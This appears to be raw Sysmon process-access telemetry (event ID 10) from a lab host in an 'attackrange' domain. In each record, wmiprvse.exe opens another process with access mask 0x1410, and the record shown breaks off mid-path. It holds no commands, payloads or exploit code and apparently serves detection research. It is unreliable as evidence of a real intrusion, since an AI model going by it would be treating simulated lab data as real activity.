15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program 